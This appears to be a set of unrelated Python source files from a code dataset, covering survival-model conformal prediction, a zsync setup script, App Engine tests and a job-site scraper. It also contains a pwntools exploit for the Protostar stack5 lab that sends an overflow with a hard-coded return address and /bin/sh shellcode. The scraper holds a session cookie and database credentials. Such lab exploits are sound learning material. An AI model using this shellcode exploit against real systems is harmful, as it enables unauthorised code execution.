self.lambda_k = None \r\n self.elap_life = None\r\n # Cumulative lambda\r\n self.sum_lambda = 0 \r\n\r\n def Load_Asset_Data(self,Model):\r\n date_base_name = Model['DB_Name']\r\n df = Read_Asset_Data(date_base_name,self.type,self.id)\r\n dic = df.to_dict('r') \r\n dic = dic[0]\r\n dic['Opt_Year'] = datetime.date(dic['Opt_Year'], 1, 1)\r\n\r\n return dic\r\n\r\n def Load_Condition(self,Model,Condition,HI_Limits):\r\n date_base_name = Model['DB_Name']\r\n tables = Model['Tables']\r\n dict_condition = {}\r\n w_t = 0 # Total 
weights of conditions defined by the model\r\n sum_w = 0\r\n self.re = 0\r\n\r\n for System in Condition:\r\n for cond in Condition[System]:\r\n table = tables[cond]\r\n df = Read_Table_Conditions(date_base_name,table,cond,self.id)\r\n w_t += Condition[System][cond]\r\n if not df.empty:\r\n w = Condition[System][cond]\r\n sum_w += w\r\n con_limits = HI_Limits[cond]\r\n dict_condition[cond] = Asset_Condition(df,w,con_limits)\r\n\r\n self.re = sum_w/w_t # ri ->Reliability index\r\n self.w_total = sum_w # Sum of total weight available conditions\r\n return(dict_condition)\r\n\r\n\r\n def Load_DB_Model(self,db_struc):\r\n data = Read_Table(db_struc)\r\n data = data[self.type]\r\n return data\r\n\r\n def Weights(self):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_HI_Weights.json' \r\n data = Read_Table(t_name)\r\n data = data[self.type]\r\n return data\r\n\r\n def Load_Cond_Limits(self):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_Condition_Limits.json'\r\n data = Read_Table(t_name)\r\n data = data[self.type]\r\n return data\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n def Load_Lambda_Constants(self,case='Con_1'):\r\n t_name = self.case_path+'APM/DATA/TABLES/Asset_Lambda_Factors.json' \r\n data = Read_Table(t_name)\r\n #data = Read_Table('APM/DATA/TABLES/Asset_Lambda_Factors.json')\r\n data = data[self.type]\r\n data = data[case]\r\n a,b,c = data['a'],data['b'],data['c']\r\n\r\n def compute_lambda(HI):\r\n if HI==None:\r\n return None\r\n else: \r\n return a*np.exp(b*HI)+c\r\n \r\n return compute_lambda\r\n\r\n def Eval_Asset_Condition(self,date,desc_date=None): \r\n #\r\n condition = self.cond\r\n\r\n sum_sw = 0\r\n sum_w = 0\r\n\r\n if desc_date==None or date0:\r\n #df = df.sort('Date')\r\n df = df.sort_values(by=['Date'])\r\n date =df['Date'].dt.date.values\r\n self.opt_date = date[0]-datetime.timedelta(days=365*5)\r\n x = np.asarray([(x - self.opt_date).days/365.25 for x in date])\r\n y = df['val_nor'].values\r\n \r\n x_end = x[-1]+35 # Assume 35 years as end of life\r\n # Add initial and final contion last values \r\n x = np.concatenate(([0], x, [x_end]))\r\n y = np.concatenate(([0], y, [1]))\r\n\r\n fit_f = Fitt_constants_HI(x,y)\r\n return fit_f\r\n\r\n# Eval constion using the fitted function\r\n def eval_cond_fit_func(self,date):\r\n #x = (date.date() - self.opt_date).days/365 # Date to eval in years\r\n x = (date - self.opt_date).days/365.25 # Date to eval in years\r\n #print(date)\r\n #x = (date.date() - self.opt_date).days/365 # Date to eval in years\r\n y = self.forecast_f(x) \r\n return y\r\n\r\n def Update_Data_Frame(self,df):\r\n con_n = []\r\n for val in df.Val.values:\r\n val_norm = self.eval_cond_f(val)\r\n con_n.append(float(val_norm))\r\n df['val_nor'] = con_n # Add condition assessment to the historic dataframe\r\n return df\r\n\r\n def eval_condition_function(self):\r\n x = self.limits \r\n #y = [0,0.25,0.5,0.75,1]\r\n y = np.linspace(0, 1, len(x), endpoint=True)\r\n\r\n\r\n low = y[0]\r\n upp = y[-1]\r\n if x[0]>x[1]:\r\n low = y[-1]\r\n upp = y[0]\r\n return interp1d(x, y,fill_value=(low, upp), bounds_error=False)\r\n","sub_path":"APM/BIN/APM_Module.py","file_name":"APM_Module.py","file_ext":"py","file_size_in_byte":18982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"610389788","text":"import os\nfrom sys import version\n\n#from distutils.core import setup\nfrom setuptools import setup\n\n# Utility function to read the README.md file from main directory, 
used for\n# the long_description.\ndef read(fname):\n    return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n    name='pyzsync',\n    version='0.2',\n    description='''A Python 3 module which implements the zsync binary\n    diff algorithm.''',\n    #long_description=read('README'),\n    author='Francisco Silveira, Georgy Angelov, Eric Pruitt, Isis Lovecruft',\n    author_email='franciscosilveira463@gmail.com',\n    url='https://github.com/FranciscoSilveira/pyzsync',\n    py_modules=['pyzsync'],\n    license='Unlicense',\n    classifiers=[\n        'Development Status :: 4 - Beta',\n        'Environment :: Console',\n        'Environment :: MacOS X',\n        'Environment :: Win32 (MS Windows)',\n        'Intended Audience :: Developers',\n        'Intended Audience :: End Users/Desktop',\n        'License :: Public Domain',\n        'Programming Language :: Python :: 3',\n        'Topic :: Security :: Cryptography',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n        'Topic :: System :: Archiving',\n        'Topic :: System :: Archiving :: Backup',\n        'Topic :: System :: Archiving :: Compression', ],\n    packages=['pyzsync'],\n    package_dir={'pyzsync': ''},\n    package_data={'': ['README.md']},\n    python_requires='>=3'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503576693","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pycox\nfrom sklearn.preprocessing import StandardScaler, PolynomialFeatures\nfrom sklearn_pandas import DataFrameMapper\nimport torch\nimport torchtuples as tt\nfrom pycox.evaluation import EvalSurv\nfrom pycox.models import CoxPH\nimport warnings\nwarnings.filterwarnings('ignore')\nimport joblib\n\nclass WeightedConformalPrediction():\n    def __init__(self,df_train,train_frac = 0.8,num_nodes=[32,32],\n                 out_features=1,batch_norm=True,\n                 batch_size=128,dropout=0.1,output_bias=False,\n                 epochs = 512, callbacks = [tt.callbacks.EarlyStopping()],\n                 verbose = True,classification_model='LR',\n                 percentile = 0.95,epsilon=0.01):\n        self.df_train = df_train\n        # self.p_t = len(self.df[self.df['event']==1])/len(self.df)\n        self.train_frac = train_frac\n        # self.cali_frac = calibration_frac\n        self.num_nodes = num_nodes\n        self.out_features = out_features\n        self.batch_norm = batch_norm\n        self.batch_size = batch_size\n        self.dropout = dropout\n        self.output_bias = output_bias\n        self.epochs = epochs\n        self.callbacks = callbacks\n        self.verbose = verbose\n        self.clf_model = classification_model\n        self.epsilon = epsilon\n        self.percentile = percentile\n        self.V = None\n        self.W = None\n        self.p_hat = None\n        self.T_h = None\n        self.x_mapper = None\n        self.get_target = lambda df: (df['duration'].values, df['event'].values)\n        self.bh = None\n        self.model = None\n    \n    # Split the raw data by train_frac into a training set and a held-out set\n    # (the held-out set is used for validation and as the calibration set).\n    def split_data(self):\n        random_idx = np.random.permutation(range(len(self.df_train)))\n        train_idx = random_idx[:int(len(self.df_train)*self.train_frac)]\n        val_idx = random_idx[int(len(self.df_train)*self.train_frac):]\n        self.Z_tr = self.df_train.iloc[train_idx,:]\n        self.Z_val = self.df_train.iloc[val_idx,:]\n    \n    def standardize(self):\n#         cols_standardize = ['x0', 'x7', 'x8','x9','x10','x11','x12','x13']\n#         cols_leave = ['x1', 'x2', 'x3', 'x4','x5','x6']\n        # cols_standardize = ['x0', 'x1', 'x2', 'x3', 'x8']\n        # cols_leave = ['x4', 'x5', 'x6', 'x7']\n        cols_standardize = ['x0','x1','x2']\n        standardize = [([col], StandardScaler()) for col in cols_standardize]\n#         leave = [(col, 
None) for col in cols_leave]\n        # polyfeature = [([col], PolynomialFeatures()) for col in cols_standardize]\n        self.x_mapper = DataFrameMapper(standardize)\n        \n        self.x_train = self.x_mapper.fit_transform(self.Z_tr).astype('float32')\n        self.x_val = self.x_mapper.transform(self.Z_val).astype('float32')\n        # self.x_ca = self.x_mapper.transform(self.Z_ca).astype('float32')\n        \n        \n        self.y_train = self.get_target(self.Z_tr)\n        self.y_val = self.get_target(self.Z_val)\n        # self.durations_ca, self.events_ca = self.get_target(self.Z_ca)\n        self.val = self.x_val, self.y_val\n        self.in_features = self.x_train.shape[1]\n    \n    def preprocessing(self):\n        self.split_data()\n        self.standardize()\n\n    def run_preprocessing(self):\n        if self.x_mapper is None:\n            self.preprocessing()\n    \n    def neural_network_cox(self):\n        self.net = torch.nn.Sequential(\n            torch.nn.Linear(self.in_features, 32),\n            torch.nn.ReLU(),\n            torch.nn.BatchNorm1d(32),\n            torch.nn.Dropout(0.1),\n\n            torch.nn.Linear(32, 32),\n            torch.nn.ReLU(),\n            torch.nn.BatchNorm1d(32),\n            torch.nn.Dropout(0.1),\n\n            torch.nn.Linear(32, self.out_features)\n        )\n        self.model = CoxPH(self.net, torch.optim.Adam)\n        self.model.fit(self.x_train, self.y_train, self.batch_size, self.epochs, self.callbacks, self.verbose,\n                val_data=self.val, val_batch_size=self.batch_size)\n    \n    def find_baseline_hazard_non_zero_idx(self):\n        if self.model is None:\n            self.neural_network_cox()\n        self.baseline_hazards = self.model.compute_baseline_hazards()\n        self.non_zero_idx = self.baseline_hazards[self.baseline_hazards>0].index[1] # pick a non-zero baseline-hazard index ([1] skips the very first non-zero entry)\n        self.bh = self.baseline_hazards.loc[self.non_zero_idx]\n    \n    def compute_nonconformal_score_single(self,t):\n        R = self.Z_tr[self.Z_tr['duration']>=t] # covariates of the subjects still at risk at time t\n        if len(R) == 0: # no one at risk: skip\n            return None\n        x_R = self.x_mapper.transform(R).astype('float32')\n        ch_r = self.model.predict_cumulative_hazards(x_R)\n        exp_g_r = ch_r.loc[self.non_zero_idx]/self.bh\n        return exp_g_r\n    \n    # Compute the nonconformity scores: given the fitted hazard model, the\n    # training set, the calibration set and the baseline hazard, fill self.V.\n    def compute_nonconformal_score(self):\n        # print('WCP:compute nonconformal score')\n        if self.bh is None:\n            self.find_baseline_hazard_non_zero_idx()\n        # NOTE: the original indexed self.Z_ca, which is never assigned once the\n        # separate calibration split was dropped; the held-out Z_val serves as the\n        # calibration set here.\n        Z_ca_1 = self.Z_val[self.Z_val['event']==1] # uncensored (event == 1) calibration samples\n        x_ca = self.x_mapper.transform(Z_ca_1).astype('float32')\n        durations_test_1, events_test_1 = self.get_target(Z_ca_1)\n        cumulative_hazards = self.model.predict_cumulative_hazards(x_ca)\n        exp_g = cumulative_hazards.loc[self.non_zero_idx].div(self.bh)\n        self.V = list()\n        for i in range(len(x_ca)): # nonconformal score\n            exp_g_r = self.compute_nonconformal_score_single(durations_test_1[i])\n            if exp_g_r is None:\n                self.V.append(np.inf)\n            else:\n                self.V.append(np.log(exp_g[i])-np.log(np.sum(exp_g_r)+exp_g[i]))\n        print('[Mean]\\t%.2f\\t [Std.]\\t %.2f\\t[Max]\\t%.2f\\t[Min]\\t%.2f'%(np.mean(self.V),np.std(self.V),np.max(self.V),np.min(self.V)))\n        self.V = np.array(self.V+[np.inf])\n    \n    # Compute the weights from the training and calibration sets, using a\n    # classifier to estimate P(T=1|X=x).\n    def compute_weight(self):\n        # print('WCP:compute weight')\n        Z_ca_1 = self.Z_val[self.Z_val['event']==1] # held-out set doubles as the calibration set (see note above)\n        X_tr = self.x_train\n        X_ca = self.x_mapper.transform(Z_ca_1).astype('float32')\n        C_tr = self.Z_tr['event'] # training-set event labels used to fit the classifier\n        # pick the classification model\n        if self.clf_model == 'RF':\n            from sklearn.ensemble import RandomForestClassifier\n            self.clf = RandomForestClassifier(max_depth=6,random_state=0)\n        elif self.clf_model == 'LR':\n            from sklearn.linear_model import LogisticRegression\n            self.clf = 
LogisticRegression(random_state=0)\n        elif self.clf_model == 'XGBoost':\n            import xgboost as xgb\n            self.clf = xgb.XGBClassifier()\n        self.clf.fit(X_tr,C_tr) # fit the classifier\n        p_predict = self.clf.predict_proba(X_ca)[:,1] # estimated P(T=1|X) on the calibration points\n        p_predict[p_predict<0.1] = 0.1 # clip the propensity estimates away from 0/1 for stability\n        p_predict[p_predict>0.9] = 0.9\n        print(np.max(p_predict),np.min(p_predict))\n        self.W = np.divide(1-p_predict,p_predict) # w_hat = (1 - p_hat) / p_hat\n    \n    def run_compute_nonconformal_score(self):\n        if self.V is None:\n            self.compute_nonconformal_score()\n        else:\n            pass \n    \n    def run_compute_weight(self):\n        if self.W is None:\n            self.compute_weight()\n        else:\n            pass\n\n    # Compute the normalized weights from the fitted classifier, the calibration\n    # weights W and the test point.\n    def compute_normalized_weight(self,x):\n        '''\n        x: test point\n        '''\n        # print('WCP:compute normalized weight')\n        p_predict = self.clf.predict_proba(x)[0,1] # P(T=1|X=x) at the test point\n        # Use the same (1-p)/p likelihood-ratio weight as the calibration points;\n        # the original used self.p_t, which is never set (commented out in __init__).\n        w_predict = (1-p_predict)/p_predict\n        normalize_term = np.sum(self.W)+w_predict \n        p_hat = self.W/normalize_term # normalized weights of the calibration points\n        p_inf = w_predict/normalize_term # weight placed on the +inf point\n\n        p_hat = np.append(p_hat,[p_inf])\n        self.p_hat = p_hat # cache so get_normalized_weight() can return it\n        return p_hat\n    \n    # Coverage mass at time t, given the nonconformity scores and the normalized\n    # weights p_hat (whose last entry is the +inf mass).\n    def compute_quantile(self,t,p_hat,exp_g_x):\n        exp_g_x_r = self.compute_nonconformal_score_single(t)\n        if exp_g_x_r is None:\n            return 1\n        V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n        p_hat_leave = p_hat[self.V<=V_x[0]]\n        return sum(p_hat_leave)\n    \n    def weighted_conformal_prediction(self,x,percentile=0.95):\n        \n        ch = self.model.predict_cumulative_hazards(x)\n        exp_g_x = ch.loc[self.non_zero_idx]/self.bh\n\n        p_hat = self.compute_normalized_weight(x)\n\n        if percentile < 0.5:\n            quantile = 1\n            t = 5\n            quantile = self.compute_quantile(t,p_hat,exp_g_x)\n            while (quantile > percentile):\n                step = t*(quantile-percentile)\n                if step < 0.01:\n                    step = 0.01\n                t = t - step # the original 't - sgn*step' used an undefined 'sgn'; quantile > percentile means t must shrink\n                if int(t) < 0:\n                    t = 0\n                    break\n                exp_g_x_r = self.compute_nonconformal_score_single(t)\n                V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n                quantile = sum(p_hat[self.V<=V_x[0]])\n                print(quantile,t)\n\n            t_l = 0\n            t_h = t\n        else:\n            quantile_l,quantile_h = 1,0\n            t_l = 5\n            t_h = 5\n            quantile_l = self.compute_quantile(t_l,p_hat,exp_g_x)\n            while (quantile_l>(1-percentile)/2):\n                step_l = t_l*(quantile_l-(1-percentile)/2)\n                if step_l < 0.01:\n                    step_l = 0.01\n                t_l = t_l - step_l\n                if int(t_l) <= 0:\n                    t_l = 0\n                    break\n                exp_g_x_r = self.compute_nonconformal_score_single(t_l)\n                if exp_g_x_r is None:\n                    quantile_l = 1\n                    continue\n                V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n                quantile_l = sum(p_hat[self.V<=V_x[0]])\n                # print(quantile_l,t_l)\n            \n            quantile_h = self.compute_quantile(t_h,p_hat,exp_g_x)\n            while (quantile_h<(0.5+percentile/2)): # use the 'percentile' argument consistently (was self.percentile)\n                step_h = t_h*(0.5+percentile/2-quantile_h)\n                if step_h < 0.01:\n                    step_h = 0.01\n                t_h = t_h + step_h\n                exp_g_x_r = self.compute_nonconformal_score_single(t_h)\n                if exp_g_x_r is None:\n                    quantile_h = 1\n                    continue\n                V_x = np.log(exp_g_x)-np.log(np.sum(exp_g_x_r))\n                # print(V_x)\n                quantile_h = sum(p_hat[self.V<=V_x[0]])\n        \n        return (t_l, t_h)\n\n    def run_training_step(self):\n        print('--'*30)\n        print('Begin Preprocessing Algorithm 1')\n        self.run_preprocessing()\n        print('--'*30)\n        try:\n            self.load_parameters(V_path = './model_data/V_alg_1.txt',W_path='./model_data/W_alg_1.txt',bh_path='./model_data/bh.txt',clf_path='./model_data/clf.model',model_path='./model_data/net_cox.model')\n            print('Loading Parameters From Files')\n        except:\n            print('Begin Nonconformal Score')\n            self.run_compute_nonconformal_score()\n            print('--'*30)\n            print('Begin Compute Weight')\n            
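# Added note: on a cold start V and W are recomputed here and then persisted,\n            # so the next run_training_step() call takes the load_parameters fast path.\n            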
def run_training_step(self):\n print('--'*30)\n print('Begin Preprocessing Algorithm 1')\n self.run_preprocessing()\n print('--'*30)\n try:\n self.load_parameters(V_path = './model_data/V_alg_1.txt',W_path='./model_data/W_alg_1.txt',bh_path='./model_data/bh.txt',clf_path='./model_data/clf.model',model_path='./model_data/net_cox.model')\n print('Loading Parameters From Files')\n except:\n print('Begin Nonconformal Score')\n self.run_compute_nonconformal_score()\n print('--'*30)\n print('Begin Compute Weight')\n self.run_compute_weight()\n self.save_parameters(V_path = './model_data/V_alg_1.txt',W_path='./model_data/W_alg_1.txt',bh_path='./model_data/bh.txt',clf_path='./model_data/clf.model',model_path='./model_data/net_cox.model')\n plt.hist(self.W,bins=100)\n plt.savefig('W.pdf')\n print(len(self.W),len(self.V))\n \n def get_T(self,x,percentile=0.95):\n t_l,t_h = self.weighted_conformal_prediction(x,percentile)\n return (t_l,t_h)\n \n def get_nonconformal_score_of_calibration(self):\n if self.V is None:\n self.compute_nonconformal_score()\n return self.V\n \n def get_weight(self):\n if self.W is None:\n self.compute_weight()\n return self.W\n \n def get_normalized_weight(self,x):\n if self.p_hat is None:\n self.compute_normalized_weight(x)\n \n return self.p_hat\n\n def save_parameters(self,V_path = 'V_alg_1.txt',W_path='W_alg_1.txt',bh_path='bh.txt',clf_path='clf.model',model_path='net_cox.model'):\n np.savetxt(V_path,self.V)\n np.savetxt(W_path,self.W)\n np.savetxt(bh_path,np.array([self.bh,self.non_zero_idx]))\n joblib.dump(self.clf,clf_path)\n joblib.dump(self.model,model_path)\n\n\n def load_parameters(self,V_path = 'V_alg_1.txt',W_path='W_alg_1.txt',bh_path='bh.txt',clf_path='clf.model',model_path='net_cox.model'):\n self.V = np.loadtxt(V_path)\n self.W = np.loadtxt(W_path)\n self.bh = float(np.loadtxt(bh_path)[0])\n self.non_zero_idx = float(np.loadtxt(bh_path)[1])\n self.clf = joblib.load(clf_path)\n self.model = joblib.load(model_path)\n","sub_path":"Final Model/cox_ph/weighted_conformal_prediction_coxph.py","file_name":"weighted_conformal_prediction_coxph.py","file_ext":"py","file_size_in_byte":13276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373130015","text":"from pwn import *\n\ncontext.log_level = 'debug'\n\nf = 'stack5'\np = process('../problems/' + f)\nb = ELF('../problems/' + f)\n\npadding = 'A'*76\nret = p32(0xffffd260) # hard-coded stack address (assumes ASLR is turned off)\nnop = '\\x90'*200\nshellcode = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\" + \\\n \"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\" + \\\n \"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\" + \\\n \"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80\"\n\npayload = padding + ret + nop + shellcode\n\nraw_input()\n\np.sendline(payload)\n\np.interactive()\n","sub_path":"learning/protostar/stack/stack5.py","file_name":"stack5.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309648183","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom datetime import datetime\nfrom google.appengine.ext import testbed\nfrom dynamic.backends import _appengine, _sqldb\n\n\nclass MockRepo:\n\n def __init__(self, config):\n self._version = config['version']\n self._pages = {}\n for p in config['pages'].split(';'):\n elems = p.split(':')\n self._pages[elems[0]] = elems[1]\n\n def version(self):\n return self._version\n\n def pages(self):\n return set(self._pages.iterkeys())\n\n def version_of(self, p):\n return self._pages[p]\n\n def content_of(self, p):\n return (\n True,\n '07 September 2011',\n p,\n u' ',\n u'this is test content',\n unicode(self._pages[p]),\n )\n\n\nclass DatabaseTest(unittest.TestCase):\n\n def setUp(self):\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_datastore_v3_stub()\n self.db = self._database()\n self.repo = MockRepo({'version': '123', 'pages': u'unit-test-1:abc;unit-test-2:def'})\n self.db.synchronize(self.repo)\n\n def tearDown(self):\n self.testbed.deactivate()\n\n 
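# The backend-specific subclasses at the bottom reuse this whole suite by\n # overriding _database().\n 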
def test_synchronize(self):\n self.assertEquals(self.db.version(), self.repo.version())\n self.assertEquals(len(self.db.pages()), 2)\n self.assertEquals(self.db.version_of('unit-test-1'), 'abc')\n\n def test_update(self):\n newrepo = MockRepo({'version': '124', 'pages': u'unit-test-1:def;/foo/bar/unit-test-3:pqr'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(len(self.db.pages()), 2)\n self.assertEquals(self.db.version_of('unit-test-1'), 'def')\n\n def test_getpage(self):\n newrepo = MockRepo({'version': '124', 'pages': u'/top/mid/leaf1:ver;/top/mid/leaf2:ver'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(self.db.content_of('badpage'), None)\n content = self.db.content_of('/top/mid/leaf1')\n self.assertEquals(len(content), 7)\n self.assertEquals(content['url'], '/top/mid/leaf1')\n self.assertEquals(content['breadcrumb'], ['/', '/top/', '/top/mid/'])\n self.assertEquals(content['today'].day, datetime.today().day)\n\n def test_getindex(self):\n newrepo = MockRepo({'version': '124', 'pages': u'/a/b1/c:ver;/a/b1/c1:ver;/a/b2/c3:ver'})\n self.assertEquals(self.db.synchronize(newrepo)[0], '124')\n self.assertEquals(len(self.db.index_of('/')['pages']), 3)\n self.assertEquals(len(self.db.index_of('/a/b1')['pages']), 2)\n self.assertEquals(len(self.db.index_of('/a/b2')['pages']), 1)\n self.assertEquals(len(self.db.index_of('/a/d')['pages']), 0)\n\n\nclass AppEngineTest(DatabaseTest):\n\n def _database(self):\n return _appengine()\n\n\nclass SqlDbTest(DatabaseTest):\n\n def _database(self):\n return _sqldb()\n","sub_path":"attic/web/ajdweb/dynamic/test/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408229800","text":"\n# BOSS Zhipin (boss直聘) job-listing crawler\n\nimport requests, re, json, time\nimport pymysql\nimport random\nfrom lxml import etree\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index, Text, DateTime\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import create_engine\n\nengine = create_engine(\"mysql+pymysql://root:root@192.168.0.7:3306/zhipin\", max_overflow=5)\nBase = declarative_base()\nsession = ''\nkeyword = 'php' # search keyword\ncitys = {'c101280100':'广州', 'c101280600':'深圳', 'c101020100':'上海'} # indexed via city_select, counting from 0\ncity_select = 0\n\nfetch_host = 'https://www.zhipin.com'\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n \"cookie\": \"sid=sem_pz_bdpc_index; __g=sem_pz_bdpc_index; _uab_collina=155367027601068152492336; __c=1553670279; lastCity=101280100; __l=r=https%3A%2F%2Fwww.zhipin.com%2F%3Fsid%3Dsem_pz_bdpc_index&l=%2Flogin.zhipin.com%2F%3Fka%3Dheader-login&g=%2Fwww.zhipin.com%2F%3Fsid%3Dsem_pz_bdpc_index; toUrl=https%3A%2F%2Fwww.zhipin.com%2Fgeek%2Fnew%2Findex%2Frecommend.html; JSESSIONID=\"\"; Hm_lvt_194df3105ad7148dcf2b98a91b5e727a=1563373739; Hm_lpvt_194df3105ad7148dcf2b98a91b5e727a=1564363308; __a=11457756.1553670275.1553670275.1553670279.372.2.371.372\",\n \"authority\":\"www.zhipin.com\",\n \"path\":\"/job_detail/?query=php&city=101280100&industry=&position=\",\n \"referer\":\"https://www.zhipin.com/?sid=sem_pz_bdpc_index\",\n \"upgrade-insecure-requests\":\"1\"\n}\nproxies = {\n 'http': 'socks5://127.0.0.1:1081'\n}\n\n# define the ORM tables\nclass jobs(Base):\n __tablename__ = 'jobs'\n id = Column(Integer, primary_key=True)\n job_url = 
Column(String(255))\n job_jid = Column(Integer)\n job_jobid = Column(Integer)\n job_title = Column(String(50))\n salary = Column(String(50))\n address = Column(String(50))\n experience = Column(String(50))\n xueli = Column(String(50))\n company = Column(String(50))\n company_type = Column(String(50))\n financing = Column(String(50))\n scale = Column(String(50))\n portrait = Column(String(255))\n username = Column(String(50))\n role = Column(String(50))\n add_time = Column(String(50))\n keyword = Column(String(50))\n city = Column(String(30))\n\nclass job_detail(Base):\n __tablename__ = 'job_detail'\n id = Column(Integer, primary_key=True)\n job_id = Column(Integer)\n active_status = Column(Integer)\n job_detail = Column(Text)\n company_introduce = Column(Text)\n commerce_info = Column(Text)\n add_time = Column(DateTime)\n\ndef parse_one_page(html):\n items = re.findall('job-primary.*?href=\"(.*?)\".*?data-jid=\"(.*?)\".*?data-jobid=\"(.*?)\".*?job-title.*?>(.*?)<.*?red.*?>(.*?)<.*?(.*?)(.*?)<.*?/em>(.*?).*?search_list_company.*?>(.*?)<.*?(.*?)<.*?/em>(.*?)<.*?/em>(.*?)<.*?src=\"(.*?)\".*?>(.*?)<.*?/em>(.*?)<', html, re.S)\n for item in items:\n yield {\n 'job_url': item[0],\n 'job_jid': item[1],\n 'job_jobid': item[2],\n 'job_title': item[3],\n 'salary': item[4],\n 'address': item[5],\n 'experience': item[6],\n 'xueli': item[7],\n 'company': item[8],\n 'company_type': item[9],\n 'financing': item[10],\n 'scale': item[11],\n 'portrait': item[12], # avatar\n 'username': item[13],\n 'role': item[14],\n 'add_time': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'keyword': keyword,\n 'city': tuple(citys.values())[city_select]\n }\n\ndef get_one_page(url):\n response = requests.get(url, headers=headers, proxies=proxies)\n return response.text\n\ndef get_jobs_detail(url):\n url = fetch_host + url\n response = requests.get(url, headers=headers, proxies=proxies)\n\n return response.text\n\n\ndef insert_mysql(item):\n db = pymysql.connect(host='192.168.0.7', user='root', password='root', port=3306)\n cursor = db.cursor()\n cursor.execute('USE zhipin')\n data = item\n table = 'jobs'\n keys = ', '.join(data.keys())\n values = ', '.join(['%s'] * len(data))\n sql = 'INSERT INTO {table} ({keys}) VALUES ({values})'.format(table=table, keys=keys, values=values)\n try:\n if cursor.execute(sql, tuple(data.values())):\n print('Collecting: ' + item['job_title'] + '------' + item['company'])\n db.commit()\n except Exception as e:\n print(e)\n db.rollback()\n db.close()\n\ndef main(page):\n url = 'https://www.zhipin.com/'+ tuple(citys.keys())[city_select] +'/?query=' + keyword + '&page=' + str(page) + '&ka=page-' + str(page)\n html = get_one_page(url)\n for item in parse_one_page(html):\n job_jobid = item['job_jobid']\n row = session.query(jobs).filter_by(job_jobid=job_jobid).first()\n if not getattr(row, 'job_jobid', None):\n insert_mysql(item)\n # print(item)\n else:\n print(row.company + '------already exists')\n\nif __name__==\"__main__\":\n Base.metadata.create_all(engine)\n # create the MySQL session object\n Session = sessionmaker(bind=engine)\n session = Session()\n\n # crawl the listing pages\n for page in range(1,12):\n cicle_time = random.uniform(2, 6)\n print('Crawling page ' + str(page) + '-----sleeping ' + str(cicle_time) + ' s')\n time.sleep(cicle_time)\n main(page)\n\n # crawl the detail pages\n rows = session.query(jobs).all()\n if rows:\n for row in rows:\n detail = session.query(job_detail).filter_by(job_id=row.id).first()\n if not detail:\n detail_html = get_jobs_detail(row.job_url)\n dh = etree.HTML(detail_html)\n job_id = row.id\n job_info = dh.xpath('//div[@class=\"job-sec\"][1]//text()')\n job_info = \" \".join(job_info) # join into a single string\n active_status = re.findall('job-detail.*?detail-op.*?/em>(.*?)<', detail_html, re.S)[0]\n company_introduce = dh.xpath('//div[contains(@class,\"job-sec\") and contains(@class,\"company-info\")]//text()')\n company_introduce = \" \".join(company_introduce)\n commerce_info = re.findall('工商信息(.*?)查看全部', detail_html, re.S) # the Chinese literals are the page's own anchor texts\n commerce_info = \" \".join(commerce_info)\n add_time = time.strftime('%Y-%m-%d %H:%M:%S')\n jd_obj = job_detail(job_id=job_id, job_detail=job_info, active_status=active_status, company_introduce=company_introduce, commerce_info=commerce_info, add_time=add_time)\n session.add(jd_obj)\n session.commit()\n cicle_time = random.uniform(2, 6)\n time.sleep(cicle_time)\n print('Collecting: ' + row.job_title + '------' + row.company + '-----sleeping ' + str(cicle_time) + ' s')\n else:\n print(row.job_title + '------' + row.company + '-----already exists')\n else:\n 
print('failed')\n","sub_path":"zhipin.py","file_name":"zhipin.py","file_ext":"py","file_size_in_byte":7015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87515154","text":"import torch\nimport h5py\nimport numpy as np\n\nfrom torch.utils.data import Dataset\n\nclass WChPointnetDataset(Dataset):\n\n def __init__(self, path, cols_to_include, train_indices, val_indices, device):\n \"\"\"\n Pointnet dataset object for WatChMaL data.\n path: location of hdf5 file\n cols_to_include: list containing index numbers of which columns to use. \n \"\"\"\n \n self.cols_to_include = cols_to_include\n self.train_indices = train_indices\n self.val_indices = val_indices\n self.device = device\n\n f = h5py.File(path, 'r')\n hdf5_event_data = f[\"event_data\"]\n hdf5_labels = f[\"labels\"]\n\n assert hdf5_event_data.shape[0] == hdf5_labels.shape[0]\n\n event_data_shape = hdf5_event_data.shape\n event_data_offset = hdf5_event_data.id.get_offset()\n event_data_dtype = hdf5_event_data.dtype\n\n #this creates a memory map - i.e. events are not loaded in memory here\n #only on get_item\n self.point_clouds = 